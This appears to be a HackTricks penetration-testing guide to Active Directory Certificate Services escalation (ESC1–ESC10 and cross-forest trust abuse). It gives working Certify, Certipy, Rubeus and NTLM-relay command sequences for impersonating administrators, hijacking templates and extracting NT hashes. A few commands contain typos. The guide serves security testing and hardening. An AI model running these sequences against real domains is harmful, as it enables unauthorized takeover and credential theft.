hacktricks/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md
Carlos Polop 797ab87ac5 a
2024-02-05 03:29:11 +01:00

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AD CS Domain Escalation

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Misconfigured Certificate Templates - ESC1

Explanation

Misconfigured Certificate Templates - ESC1 Explained

  • Enrolment rights are granted to low-privileged users by the Enterprise CA.
  • Manager approval is not required.
  • No signatures from authorized personnel are needed.
  • Security descriptors on certificate templates are overly permissive, allowing low-privileged users to obtain enrolment rights.
  • Certificate templates are configured to define EKUs that facilitate authentication:
    • Extended Key Usage (EKU) identifiers such as Client Authentication (OID 1.3.6.1.5.5.7.3.2), PKINIT Client Authentication (1.3.6.1.5.2.3.4), Smart Card Logon (OID 1.3.6.1.4.1.311.20.2.2), Any Purpose (OID 2.5.29.37.0), or no EKU (SubCA) are included.
  • The ability for requesters to include a subjectAltName in the Certificate Signing Request (CSR) is allowed by the template:
    • The Active Directory (AD) prioritizes the subjectAltName (SAN) in a certificate for identity verification if present. This means that by specifying the SAN in a CSR, a certificate can be requested to impersonate any user (e.g., a domain administrator). Whether a SAN can be specified by the requester is indicated in the certificate template's AD object through the mspki-certificate-name-flag property. This property is a bitmask, and the presence of the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag permits the specification of the SAN by the requester.

{% hint style="danger" %} The configuration outlined permits low-privileged users to request certificates with any SAN of choice, enabling authentication as any domain principal through Kerberos or SChannel. {% endhint %}

This feature is sometimes enabled to support the on-the-fly generation of HTTPS or host certificates by products or deployment services, or due to a lack of understanding.

It is noted that creating a certificate with this option triggers a warning, which is not the case when an existing certificate template (such as the WebServer template, which has CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT enabled) is duplicated and then modified to include an authentication OID.

Abuse

To find vulnerable certificate templates you can run:

Certify.exe find /vulnerable
certipy find -username john@corp.local -password Passw0rd -dc-ip 172.16.126.128

To abuse this vulnerability to impersonate an administrator one could run:

Certify.exe request /ca:dc.domain.local-DC-CA /template:VulnTemplate /altname:localadmin
certipy req -username john@corp.local -password Passw0rd! -target-ip ca.corp.local -ca 'corp-CA' -template 'ESC1' -upn 'administrator@corp.local'

Then you can transform the generated certificate to .pfx format and use it to authenticate using Rubeus or certipy again:

Rubeus.exe asktgt /user:localdomain /certificate:localadmin.pfx /password:password123! /ptt
certipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'corp.local' -dc-ip 172.16.19.100

The Windows binaries "Certreq.exe" & "Certutil.exe" can be used to generate the PFX: https://gist.github.com/b4cktr4ck2/95a9b908e57460d9958e8238f85ef8ee

The enumeration of certificate templates within the AD Forest's configuration schema, specifically those not necessitating approval or signatures, possessing a Client Authentication or Smart Card Logon EKU, and with the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag enabled, can be performed by running the following LDAP query:

(&(objectclass=pkicertificatetemplate)(!(mspki-enrollmentflag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-rasignature=*)))(|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2)(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2)(pkiextendedkeyusage=1.3.6.1.5.2.3.4)(pkiextendedkeyusage=2.5.29.37.0)(!(pkiextendedkeyusage=*)))(mspkicertificate-name-flag:1.2.840.113556.1.4.804:=1))

Misconfigured Certificate Templates - ESC2

Explanation

The second abuse scenario is a variation of the first one:

  1. Enrollment rights are granted to low-privileged users by the Enterprise CA.
  2. The requirement for manager approval is disabled.
  3. The need for authorized signatures is omitted.
  4. An overly permissive security descriptor on the certificate template grants certificate enrollment rights to low-privileged users.
  5. The certificate template is defined to include the Any Purpose EKU or no EKU.

The Any Purpose EKU permits a certificate to be obtained by an attacker for any purpose, including client authentication, server authentication, code signing, etc. The same technique used for ESC3 can be employed to exploit this scenario.

Certificates with no EKUs, which act as subordinate CA certificates, can be exploited for any purpose and can also be used to sign new certificates. Hence, an attacker could specify arbitrary EKUs or fields in the new certificates by utilizing a subordinate CA certificate.

However, new certificates created for domain authentication will not function if the subordinate CA is not trusted by the NTAuthCertificates object, which is the default setting. Nonetheless, an attacker can still create new certificates with any EKU and arbitrary certificate values. These could be potentially abused for a wide range of purposes (e.g., code signing, server authentication, etc.) and could have significant implications for other applications in the network like SAML, AD FS, or IPSec.

To enumerate templates that match this scenario within the AD Forests configuration schema, the following LDAP query can be run:

(&(objectclass=pkicertificatetemplate)(!(mspki-enrollmentflag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-rasignature=*)))(|(pkiextendedkeyusage=2.5.29.37.0)(!(pkiextendedkeyusage=*))))

Misconfigured Enrolment Agent Templates - ESC3

Explanation

This scenario is like the first and second one but abusing a different EKU (Certificate Request Agent) and 2 different templates (therefore it has 2 sets of requirements),

The Certificate Request Agent EKU (OID 1.3.6.1.4.1.311.20.2.1), known as Enrollment Agent in Microsoft documentation, allows a principal to enroll for a certificate on behalf of another user.

The “enrollment agent” enrolls in such a template and uses the resulting certificate to co-sign a CSR on behalf of the other user. It then sends the co-signed CSR to the CA, enrolling in a template that permits “enroll on behalf of”, and the CA responds with a certificate belong to the “other” user.

Requirements 1:

  • Enrollment rights are granted to low-privileged users by the Enterprise CA.
  • The requirement for manager approval is omitted.
  • No requirement for authorized signatures.
  • The security descriptor of the certificate template is excessively permissive, granting enrollment rights to low-privileged users.
  • The certificate template includes the Certificate Request Agent EKU, enabling the request of other certificate templates on behalf of other principals.

Requirements 2:

  • The Enterprise CA grants enrollment rights to low-privileged users.
  • Manager approval is bypassed.
  • The template's schema version is either 1 or exceeds 2, and it specifies an Application Policy Issuance Requirement that necessitates the Certificate Request Agent EKU.
  • An EKU defined in the certificate template permits domain authentication.
  • Restrictions for enrollment agents are not applied on the CA.

Abuse

You can use Certify or Certipy to abuse this scenario:

# Request an enrollment agent certificate
Certify.exe request /ca:DC01.DOMAIN.LOCAL\DOMAIN-CA /template:Vuln-EnrollmentAgent
certipy req -username john@corp.local -password Passw0rd! -target-ip ca.corp.local' -ca 'corp-CA' -template 'templateName'

# Enrollment agent certificate to issue a certificate request on behalf of
# another user to a template that allow for domain authentication
Certify.exe request /ca:DC01.DOMAIN.LOCAL\DOMAIN-CA /template:User /onbehalfof:CORP\itadmin /enrollment:enrollmentcert.pfx /enrollcertpwd:asdf
certipy req -username john@corp.local -password Pass0rd! -target-ip ca.corp.local -ca 'corp-CA' -template 'User' -on-behalf-of 'corp\administrator' -pfx 'john.pfx'

# Use Rubeus with the certificate to authenticate as the other user
Rubeu.exe asktgt /user:CORP\itadmin /certificate:itadminenrollment.pfx /password:asdf

The users who are allowed to obtain an enrollment agent certificate, the templates in which enrollment agents are permitted to enroll, and the accounts on behalf of which the enrollment agent may act can be constrained by enterprise CAs. This is achieved by opening the certsrc.msc snap-in, right-clicking on the CA, clicking Properties, and then navigating to the “Enrollment Agents” tab.

However, it is noted that the default setting for CAs is to “Do not restrict enrollment agents.” When the restriction on enrollment agents is enabled by administrators, setting it to “Restrict enrollment agents,” the default configuration remains extremely permissive. It allows Everyone access to enroll in all templates as anyone.

Vulnerable Certificate Template Access Control - ESC4

Explanation

The security descriptor on certificate templates defines the permissions specific AD principals possess concerning the template.

Should an attacker possess the requisite permissions to alter a template and institute any exploitable misconfigurations outlined in prior sections, privilege escalation could be facilitated.

Notable permissions applicable to certificate templates include:

  • Owner: Grants implicit control over the object, allowing for the modification of any attributes.
  • FullControl: Enables complete authority over the object, including the capability to alter any attributes.
  • WriteOwner: Permits the alteration of the object's owner to a principal under the attacker's control.
  • WriteDacl: Allows for the adjustment of access controls, potentially granting an attacker FullControl.
  • WriteProperty: Authorizes the editing of any object properties.

Abuse

An example of a privesc like the previous one:

ESC4 is when a user has write privileges over a certificate template. This can for instance be abused to overwrite the configuration of the certificate template to make the template vulnerable to ESC1.

As we can see in the path above, only JOHNPC has these privileges, but our user JOHN has the new AddKeyCredentialLink edge to JOHNPC. Since this technique is related to certificates, I have implemented this attack as well, which is known as Shadow Credentials. Heres a little sneak peak of Certipys shadow auto command to retrieve the NT hash of the victim.

certipy shadow auto 'corp.local/john:Passw0rd!@dc.corp.local' -account 'johnpc'

Certipy can overwrite the configuration of a certificate template with a single command. By default, Certipy will overwrite the configuration to make it vulnerable to ESC1. We can also specify the -save-old parameter to save the old configuration, which will be useful for restoring the configuration after our attack.

# Make template vuln to ESC1
certipy template -username john@corp.local -password Passw0rd -template ESC4-Test -save-old

# Exploit ESC1
certipy req -username john@corp.local -password Passw0rd -ca corp-DC-CA -target ca.corp.local -template ESC4-Test -upn administrator@corp.local

# Restore config
certipy template -username john@corp.local -password Passw0rd -template ESC4-Test -configuration ESC4-Test.json

Vulnerable PKI Object Access Control - ESC5

Explanation

The extensive web of interconnected ACL-based relationships, which includes several objects beyond certificate templates and the certificate authority, can impact the security of the entire AD CS system. These objects, which can significantly affect security, encompass:

  • The AD computer object of the CA server, which may be compromised through mechanisms like S4U2Self or S4U2Proxy.
  • The RPC/DCOM server of the CA server.
  • Any descendant AD object or container within the specific container path CN=Public Key Services,CN=Services,CN=Configuration,DC=<DOMAIN>,DC=<COM>. This path includes, but is not limited to, containers and objects such as the Certificate Templates container, Certification Authorities container, the NTAuthCertificates object, and the Enrollment Services Container.

The security of the PKI system can be compromised if a low-privileged attacker manages to gain control over any of these critical components.

EDITF_ATTRIBUTESUBJECTALTNAME2 - ESC6

Explanation

The subject discussed in the CQure Academy post also touches on the EDITF_ATTRIBUTESUBJECTALTNAME2 flag's implications, as outlined by Microsoft. This configuration, when activated on a Certification Authority (CA), permits the inclusion of user-defined values in the subject alternative name for any request, including those constructed from Active Directory®. Consequently, this provision allows an intruder to enroll through any template set up for domain authentication—specifically those open to unprivileged user enrollment, like the standard User template. As a result, a certificate can be secured, enabling the intruder to authenticate as a domain administrator or any other active entity within the domain.

Note: The approach for appending alternative names into a Certificate Signing Request (CSR), through the -attrib "SAN:" argument in certreq.exe (referred to as “Name Value Pairs”), presents a contrast from the exploitation strategy of SANs in ESC1. Here, the distinction lies in how account information is encapsulated—within a certificate attribute, rather than an extension.

Abuse

To verify whether the setting is activated, organizations can utilize the following command with certutil.exe:

certutil -config "CA_HOST\CA_NAME" -getreg "policy\EditFlags"

This operation essentially employs remote registry access, hence, an alternative approach might be:

reg.exe query \\<CA_SERVER>\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration\<CA_NAME>\PolicyModules\CertificateAuthority_MicrosoftDefault.Policy\ /v EditFlags 

Tools like Certify and Certipy are capable of detecting this misconfiguration and exploiting it:

# Detect vulnerabilities, including this one
Certify.exe find

# Exploit vulnerability
Certify.exe request /ca:dc.domain.local\theshire-DC-CA /template:User /altname:localadmin
certipy req -username john@corp.local -password Passw0rd -ca corp-DC-CA -target ca.corp.local -template User -upn administrator@corp.local

To alter these settings, assuming one possesses domain administrative rights or equivalent, the following command can be executed from any workstation:

certutil -config "CA_HOST\CA_NAME" -setreg policy\EditFlags +EDITF_ATTRIBUTESUBJECTALTNAME2

To disable this configuration in your environment, the flag can be removed with:

certutil -config "CA_HOST\CA_NAME" -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2

{% hint style="warning" %} Post the May 2022 security updates, newly issued certificates will contain a security extension that incorporates the requester's objectSid property. For ESC1, this SID is derived from the specified SAN. However, for ESC6, the SID mirrors the requester's objectSid, not the SAN.
To exploit ESC6, it is essential for the system to be susceptible to ESC10 (Weak Certificate Mappings), which prioritizes the SAN over the new security extension. {% endhint %}

Vulnerable Certificate Authority Access Control - ESC7

Attack 1

Explanation

Access control for a certificate authority is maintained through a set of permissions that govern CA actions. These permissions can be viewed by accessing certsrv.msc, right-clicking a CA, selecting properties, and then navigating to the Security tab. Additionally, permissions can be enumerated using the PSPKI module with commands such as:

Get-CertificationAuthority -ComputerName dc.domain.local | Get-CertificationAuthorityAcl | select -expand Access

This provides insights into the primary rights, namely ManageCA and ManageCertificates, correlating to the roles of “CA administrator” and “Certificate Manager” respectively.

Abuse

Having ManageCA rights on a certificate authority enables the principal to manipulate settings remotely using PSPKI. This includes toggling the EDITF_ATTRIBUTESUBJECTALTNAME2 flag to permit SAN specification in any template, a critical aspect of domain escalation.

Simplification of this process is achievable through the use of PSPKIs Enable-PolicyModuleFlag cmdlet, allowing modifications without direct GUI interaction.

Possession of ManageCertificates rights facilitates the approval of pending requests, effectively circumventing the "CA certificate manager approval" safeguard.

A combination of Certify and PSPKI modules can be utilized to request, approve, and download a certificate:

# Request a certificate that will require an approval
Certify.exe request /ca:dc.domain.local\theshire-DC-CA /template:ApprovalNeeded
[...]
[*] CA Response      : The certificate is still pending.
[*] Request ID       : 336
[...]

# Use PSPKI module to approve the request
Import-Module PSPKI
Get-CertificationAuthority -ComputerName dc.domain.local | Get-PendingRequest -RequestID 336 | Approve-CertificateRequest

# Download the certificate
Certify.exe download /ca:dc.domain.local\theshire-DC-CA /id:336

Attack 2

Explanation

{% hint style="warning" %} In the previous attack Manage CA permissions were used to enable the EDITF_ATTRIBUTESUBJECTALTNAME2 flag to perform the ESC6 attack, but this will not have any effect until the CA service (CertSvc) is restarted. When a user has the Manage CA access right, the user is also allowed to restart the service. However, it does not mean that the user can restart the service remotely. Furthermore, ESC6 might not work out of the box in most patched environments due to the May 2022 security updates. {% endhint %}

Therefore, another attack is presented here.

Perquisites:

  • Only ManageCA permission
  • Manage Certificates permission (can be granted from ManageCA)
  • Certificate template SubCA must be enabled (can be enabled from ManageCA)

The technique relies on the fact that users with the Manage CA and Manage Certificates access right can issue failed certificate requests. The SubCA certificate template is vulnerable to ESC1, but only administrators can enroll in the template. Thus, a user can request to enroll in the SubCA - which will be denied - but then issued by the manager afterwards.

Abuse

You can grant yourself the Manage Certificates access right by adding your user as a new officer.

certipy ca -ca 'corp-DC-CA' -add-officer john -username john@corp.local -password Passw0rd
Certipy v4.0.0 - by Oliver Lyak (ly4k)

[*] Successfully added officer 'John' on 'corp-DC-CA'

The SubCA template can be enabled on the CA with the -enable-template parameter. By default, the SubCA template is enabled.

# List templates
certipy ca -username john@corp.local -password Passw0rd! -target-ip ca.corp.local -ca 'corp-CA' -enable-template 'SubCA'
## If SubCA is not there, you need to enable it

# Enable SubCA
certipy ca -ca 'corp-DC-CA' -enable-template SubCA -username john@corp.local -password Passw0rd
Certipy v4.0.0 - by Oliver Lyak (ly4k)

[*] Successfully enabled 'SubCA' on 'corp-DC-CA'

If we have fulfilled the prerequisites for this attack, we can start by requesting a certificate based on the SubCA template.

This request will be denied, but we will save the private key and note down the request ID.

certipy req -username john@corp.local -password Passw0rd -ca corp-DC-CA -target ca.corp.local -template SubCA -upn administrator@corp.local
Certipy v4.0.0 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 785
Would you like to save the private key? (y/N) y
[*] Saved private key to 785.key
[-] Failed to request certificate

With our Manage CA and Manage Certificates, we can then issue the failed certificate request with the ca command and the -issue-request <request ID> parameter.

certipy ca -ca 'corp-DC-CA' -issue-request 785 -username john@corp.local -password Passw0rd
Certipy v4.0.0 - by Oliver Lyak (ly4k)

[*] Successfully issued certificate

And finally, we can retrieve the issued certificate with the req command and the -retrieve <request ID> parameter.

certipy req -username john@corp.local -password Passw0rd -ca corp-DC-CA -target ca.corp.local -retrieve 785
Certipy v4.0.0 - by Oliver Lyak (ly4k)

[*] Rerieving certificate with ID 785
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'administrator@corp.local'
[*] Certificate has no object SID
[*] Loaded private key from '785.key'
[*] Saved certificate and private key to 'administrator.pfx'

NTLM Relay to AD CS HTTP Endpoints ESC8

Explanation

{% hint style="info" %} In environments where AD CS is installed, if a web enrollment endpoint vulnerable exists and at least one certificate template is published that permits domain computer enrollment and client authentication (such as the default Machine template), it becomes possible for any computer with the spooler service active to be compromised by an attacker! {% endhint %}

Several HTTP-based enrollment methods are supported by AD CS, made available through additional server roles that administrators may install. These interfaces for HTTP-based certificate enrollment are susceptible to NTLM relay attacks. An attacker, from a compromised machine, can impersonate any AD account that authenticates via inbound NTLM. While impersonating the victim account, these web interfaces can be accessed by an attacker to request a client authentication certificate using the User or Machine certificate templates.

  • The web enrollment interface (an older ASP application available at http://<caserver>/certsrv/), defaults to HTTP only, which does not offer protection against NTLM relay attacks. Additionally, it explicitly permits only NTLM authentication through its Authorization HTTP header, rendering more secure authentication methods like Kerberos inapplicable.
  • The Certificate Enrollment Service (CES), Certificate Enrollment Policy (CEP) Web Service, and Network Device Enrollment Service (NDES) by default support negotiate authentication via their Authorization HTTP header. Negotiate authentication supports both Kerberos and NTLM, allowing an attacker to downgrade to NTLM authentication during relay attacks. Although these web services enable HTTPS by default, HTTPS alone does not safeguard against NTLM relay attacks. Protection from NTLM relay attacks for HTTPS services is only possible when HTTPS is combined with channel binding. Regrettably, AD CS does not activate Extended Protection for Authentication on IIS, which is required for channel binding.

A common issue with NTLM relay attacks is the short duration of NTLM sessions and the inability of the attacker to interact with services that require NTLM signing.

Nevertheless, this limitation is overcome by exploiting an NTLM relay attack to acquire a certificate for the user, as the certificate's validity period dictates the session's duration, and the certificate can be employed with services that mandate NTLM signing. For instructions on utilizing a stolen certificate, refer to:

{% content-ref url="account-persistence.md" %} account-persistence.md {% endcontent-ref %}

Another limitation of NTLM relay attacks is that an attacker-controlled machine must be authenticated to by a victim account. The attacker could either wait or attempt to force this authentication:

{% content-ref url="../printers-spooler-service-abuse.md" %} printers-spooler-service-abuse.md {% endcontent-ref %}

Abuse

Certifys cas enumerates enabled HTTP AD CS endpoints:

Certify.exe cas

The msPKI-Enrollment-Servers property is used by enterprise Certificate Authorities (CAs) to store Certificate Enrollment Service (CES) endpoints. These endpoints can be parsed and listed by utilizing the tool Certutil.exe:

certutil.exe -enrollmentServerURL -config DC01.DOMAIN.LOCAL\DOMAIN-CA
Import-Module PSPKI
Get-CertificationAuthority | select Name,Enroll* | Format-List *

Abuse with Certify

## In the victim machine
# Prepare to send traffic to the compromised machine 445 port to 445 in the attackers machine
PortBender redirect 445 8445
rportfwd 8445 127.0.0.1 445
# Prepare a proxy that the attacker can use
socks 1080

## In the attackers
proxychains ntlmrelayx.py -t http://<AC Server IP>/certsrv/certfnsh.asp -smb2support --adcs --no-http-server

# Force authentication from victim to compromised machine with port forwards
execute-assembly C:\SpoolSample\SpoolSample\bin\Debug\SpoolSample.exe <victim> <compromised>

Abuse with Certipy

The request for a certificate is made by Certipy by default based on the template Machine or User, determined by whether the account name being relayed ends in $. The specification of an alternative template can be achieved through the use of the -template parameter.

A technique like PetitPotam can then be employed to coerce authentication. When dealing with domain controllers, the specification of -template DomainController is required.

certipy relay -ca ca.corp.local
Certipy v4.0.0 - by Oliver Lyak (ly4k)

[*] Targeting http://ca.corp.local/certsrv/certfnsh.asp
[*] Listening on 0.0.0.0:445
[*] Requesting certificate for 'CORP\\Administrator' based on the template 'User'
[*] Got certificate with UPN 'Administrator@corp.local'
[*] Certificate object SID is 'S-1-5-21-980154951-4172460254-2779440654-500'
[*] Saved certificate and private key to 'administrator.pfx'
[*] Exiting...

No Security Extension - ESC9

Explanation

The new value CT_FLAG_NO_SECURITY_EXTENSION (0x80000) for msPKI-Enrollment-Flag, referred to as ESC9, prevents the embedding of the new szOID_NTDS_CA_SECURITY_EXT security extension in a certificate. This flag becomes relevant when StrongCertificateBindingEnforcement is set to 1 (the default setting), which contrasts with a setting of 2. Its relevance is heightened in scenarios where a weaker certificate mapping for Kerberos or Schannel might be exploited (as in ESC10), given that the absence of ESC9 would not alter the requirements.

The conditions under which this flag's setting becomes significant include:

  • StrongCertificateBindingEnforcement is not adjusted to 2 (with the default being 1), or CertificateMappingMethods includes the UPN flag.
  • The certificate is marked with the CT_FLAG_NO_SECURITY_EXTENSION flag within the msPKI-Enrollment-Flag setting.
  • Any client authentication EKU is specified by the certificate.
  • GenericWrite permissions are available over any account to compromise another.

Abuse Scenario

Suppose John@corp.local holds GenericWrite permissions over Jane@corp.local, with the goal to compromise Administrator@corp.local. The ESC9 certificate template, which Jane@corp.local is permitted to enroll in, is configured with the CT_FLAG_NO_SECURITY_EXTENSION flag in its msPKI-Enrollment-Flag setting.

Initially, Jane's hash is acquired using Shadow Credentials, thanks to John's GenericWrite:

certipy shadow auto -username John@corp.local -password Passw0rd! -account Jane

Subsequently, Jane's userPrincipalName is modified to Administrator, purposely omitting the @corp.local domain part:

certipy account update -username John@corp.local -password Passw0rd! -user Jane -upn Administrator

This modification does not violate constraints, given that Administrator@corp.local remains distinct as Administrator's userPrincipalName.

Following this, the ESC9 certificate template, marked vulnerable, is requested as Jane:

certipy req -username jane@corp.local -hashes <hash> -ca corp-DC-CA -template ESC9

It's noted that the certificate's userPrincipalName reflects Administrator, devoid of any “object SID”.

Jane's userPrincipalName is then reverted to her original, Jane@corp.local:

certipy account update -username John@corp.local -password Passw0rd! -user Jane -upn Jane@corp.local

Attempting authentication with the issued certificate now yields the NT hash of Administrator@corp.local. The command must include -domain <domain> due to the certificate's lack of domain specification:

certipy auth -pfx adminitrator.pfx -domain corp.local

Weak Certificate Mappings - ESC10

Explanation

Two registry key values on the domain controller are referred to by ESC10:

  • The default value for CertificateMappingMethods under HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\Schannel is 0x18 (0x8 | 0x10), previously set to 0x1F.
  • The default setting for StrongCertificateBindingEnforcement under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Kdc is 1, previously 0.

Case 1

When StrongCertificateBindingEnforcement is configured as 0.

Case 2

If CertificateMappingMethods includes the UPN bit (0x4).

Abuse Case 1

With StrongCertificateBindingEnforcement configured as 0, an account A with GenericWrite permissions can be exploited to compromise any account B.

For instance, having GenericWrite permissions over Jane@corp.local, an attacker aims to compromise Administrator@corp.local. The procedure mirrors ESC9, allowing any certificate template to be utilized.

Initially, Jane's hash is retrieved using Shadow Credentials, exploiting the GenericWrite.

certipy shadow autho -username John@corp.local -p Passw0rd! -a Jane

Subsequently, Jane's userPrincipalName is altered to Administrator, deliberately omitting the @corp.local portion to avoid a constraint violation.

certipy account update -username John@corp.local -password Passw0rd! -user Jane -upn Administrator

Following this, a certificate enabling client authentication is requested as Jane, using the default User template.

certipy req -ca 'corp-DC-CA' -username Jane@corp.local -hashes <hash>

Jane's userPrincipalName is then reverted to its original, Jane@corp.local.

certipy account update -username John@corp.local -password Passw0rd! -user Jane -upn Jane@corp.local

Authenticating with the obtained certificate will yield the NT hash of Administrator@corp.local, necessitating the specification of the domain in the command due to the absence of domain details in the certificate.

certipy auth -pfx administrator.pfx -domain corp.local

Abuse Case 2

With the CertificateMappingMethods containing the UPN bit flag (0x4), an account A with GenericWrite permissions can compromise any account B lacking a userPrincipalName property, including machine accounts and the built-in domain administrator Administrator.

Here, the goal is to compromise DC$@corp.local, starting with obtaining Jane's hash through Shadow Credentials, leveraging the GenericWrite.

certipy shadow auto -username John@corp.local -p Passw0rd! -account Jane

Jane's userPrincipalName is then set to DC$@corp.local.

certipy account update -username John@corp.local -password Passw0rd! -user Jane -upn 'DC$@corp.local'

A certificate for client authentication is requested as Jane using the default User template.

certipy req -ca 'corp-DC-CA' -username Jane@corp.local -hashes <hash>

Jane's userPrincipalName is reverted to its original after this process.

certipy account update -username John@corp.local -password Passw0rd! -user Jane -upn 'Jane@corp.local'

To authenticate via Schannel, Certipys -ldap-shell option is utilized, indicating authentication success as u:CORP\DC$.

certipy auth -pfx dc.pfx -dc-ip 172.16.126.128 -ldap-shell

Through the LDAP shell, commands such as set_rbcd enable Resource-Based Constrained Delegation (RBCD) attacks, potentially compromising the domain controller.

certipy auth -pfx dc.pfx -dc-ip 172.16.126.128 -ldap-shell

This vulnerability also extends to any user account lacking a userPrincipalName or where it does not match the sAMAccountName, with the default Administrator@corp.local being a prime target due to its elevated LDAP privileges and the absence of a userPrincipalName by default.

Compromising Forests with Certificates Explained in Passive Voice

Breaking of Forest Trusts by Compromised CAs

The configuration for cross-forest enrollment is made relatively straightforward. The root CA certificate from the resource forest is published to the account forests by administrators, and the enterprise CA certificates from the resource forest are added to the NTAuthCertificates and AIA containers in each account forest. To clarify, this arrangement grants the CA in the resource forest complete control over all other forests for which it manages PKI. Should this CA be compromised by attackers, certificates for all users in both the resource and account forests could be forged by them, thereby breaking the security boundary of the forest.

Enrollment Privileges Granted to Foreign Principals

In multi-forest environments, caution is required concerning Enterprise CAs that publish certificate templates which allow Authenticated Users or foreign principals (users/groups external to the forest to which the Enterprise CA belongs) enrollment and edit rights.
Upon authentication across a trust, the Authenticated Users SID is added to the users token by AD. Thus, if a domain possesses an Enterprise CA with a template that allows Authenticated Users enrollment rights, a template could potentially be enrolled in by a user from a different forest. Likewise, if enrollment rights are explicitly granted to a foreign principal by a template, a cross-forest access-control relationship is thereby created, enabling a principal from one forest to enroll in a template from another forest.

Both scenarios lead to an increase in the attack surface from one forest to another. The settings of the certificate template could be exploited by an attacker to obtain additional privileges in a foreign domain.

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